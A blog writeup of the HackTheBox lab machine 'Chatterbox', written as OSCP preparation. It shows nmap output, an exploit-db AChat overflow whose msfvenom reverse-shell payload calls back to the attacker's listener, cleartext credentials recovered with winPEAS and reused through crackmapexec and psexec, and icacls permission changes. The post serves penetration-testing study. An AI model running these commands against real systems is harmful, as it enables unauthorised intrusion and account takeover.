Post

Prep for OSCP — HTB [M] Chatterbox — Writeup

Posted
Chatterbox Preview
Chatterbox Preview
By yuznumara
3 min read

You can read the article from the medium also.

Information Gathering

Starting with nmap command.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

└─$ nmap -sC -sV -p- --open -vvv -oN enum/nmap 10.10.10.74
Nmap scan report for 10.10.10.74 (10.10.10.74)
Host is up, received conn-refused (0.12s latency).
Scanned at 2024-04-29 14:07:42 EDT for 117s
Not shown: 61256 closed tcp ports (conn-refused), 4268 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         syn-ack AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
|_http-title: Site doesn't have a title.
|_http-server-header: AChat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
9256/tcp  open  achat        syn-ack AChat chat system
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Machine name is Chatterbox so i think we’ll probably proceed with AChat.

Initial Foothold

I quickly found a link via google searching. https://tenaka.gitbook.io/pentesting/boxes/achat

1
2
3
4
5
6

└─$ searchsploit achat
└─$ cp /usr/share/exploitdb/exploits/windows/remote/36025.py achat.py
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.11 lport=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
└─$ python2 achat.py
---->{P00F}!

I took the output of msfvenom and paste in achat.py file and ran it.

1
2
3
4
5
6
7

└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.74] 49166
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Privilege Escalation

I ran the winpeas.exe for quickly enumeration. As you ran the winpeas couple times, you used to ignore false positives at the output and understand the true positive/false positive ones.

I’ve scrolled the output fast and clear-text credentials have been caught into my eyes.

1
2
3

DefaultUserName               :  Alfred
DefaultPassword               :  Welcome1!

I made password spraying in Administrator account and!

1
2

└─$ crackmapexec smb 10.10.10.74 -u 'Administrator' -p 'Welcome1!'
SMB         10.10.10.74     445    CHATTERBOX       [+] Chatterbox\Administrator:Welcome1! (Pwn3d!)

And I logon with Administrator account via ps-exec.

1

└─$ impacket-psexec Administrator:'Welcome1!'@10.10.10.74

I was surprised when i saw that i couldn’t read the root.txt.

1
2

C:\Users\Administrator\Desktop> type root.txt
Access is denied.

Checked my permissions and tried to grant as alfred to read root.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13

C:\Users\Administrator\Desktop> dir /q root.txt
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of C:\Users\Administrator\Desktop

05/02/2024  06:54 PM                34 ...                    root.txt
               1 File(s)             34 bytes
               0 Dir(s)   3,340,021,760 bytes free

C:\Users\Administrator\Desktop> icacls root.txt /grant alfred:F
root.txt: Access is denied.
Successfully processed 0 files; Failed processing 1 files

Failure. I really didn’t get why didn’t work. So i passed back to Alfred user with exploit and then tried the above commands again.

1
2
3
4
5
6

C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F    
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop> type root.txt

Conclusions

Well, Besides Offsec says “Try Harder”, this machine teaches me one thing: “Keep it Simple”. We shouldn’t forget the Occam’s razor theory. Some HTB machines are forcing to think harder, but first priority should be to choose simple one.

With this machine, i practiced icacls and dir /q commands.

Blogging, OSCP
pentesting oscp htb
This post is licensed under CC BY 4.0 by the author.

Trending Tags

pentesting htb oscp software